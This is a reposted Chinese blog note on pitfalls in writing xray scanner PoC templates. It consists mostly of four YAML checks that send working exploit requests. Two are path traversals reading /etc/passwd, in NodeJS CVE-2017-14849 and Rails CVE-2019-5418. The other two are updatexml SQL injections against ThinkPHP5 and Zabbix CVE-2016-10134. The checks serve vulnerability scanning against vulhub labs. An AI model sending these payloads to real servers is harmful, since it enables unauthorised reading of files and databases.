php写poc,xray写POC踩坑
靜態文件目錄不一定是static。
只考慮了linux的情況,如果是 windows 呢,能讀取某些應用自己的源碼嗎。
實際環境參數不一定是id,thinkphp 不適合使用 poc 來寫
NodeJS_path-validation_CVE-2017-14849.yml name: NodeJS_path-validation_CVE-2017-14849 rules: - method: GET path: /static/../../../a/../../../../etc/passwd headers: Accept: '' follow_redirects: false expression: | status==200 && body.bcontains(b'root:x:0:0') detail: author: 17bdw Affected Version: "NodeJS 8.5.0" links: - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849
Rails_file_content_disclosure_CVE-2019-5418 name: Rails_file_content_disclosure_CVE-2019-5418 rules: - method: GET path: /robots headers: Accept: '../../../../../../../../etc/passwd{{' follow_redirects: false expression: | status==200 && body.bcontains(b'root:x:0:0') detail: author: 17bdw Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1" links: - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418
thinkphp5-in-sqlinjection name: thinkphp5-in-sqlinjection rules: - method: GET path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1 expression: | body.bcontains(b'cf79ae6addba60ad018347359bd144d') detail: author: 17bdw Affected Version: "thinkphp5-in-sqlinjection" vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1" links: - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
zabbix_3.0.3_jsrpc.php_CVE-2016-10134 name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134 rules: - method: GET path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0) expression: | body.bcontains(b'cf79ae6addba60ad018347359bd144d') detail: author: 17bdw Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134" vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)" links: - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
來源:博客園
作者:17bdw
鏈接:https://www.cnblogs.com/17bdw/p/11515741.html
總結
以上是生活随笔為你收集整理的php写poc,xray写POC踩坑的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java 实验张智,JAVA实验指导
- 下一篇: xstat博客主题php,WordPre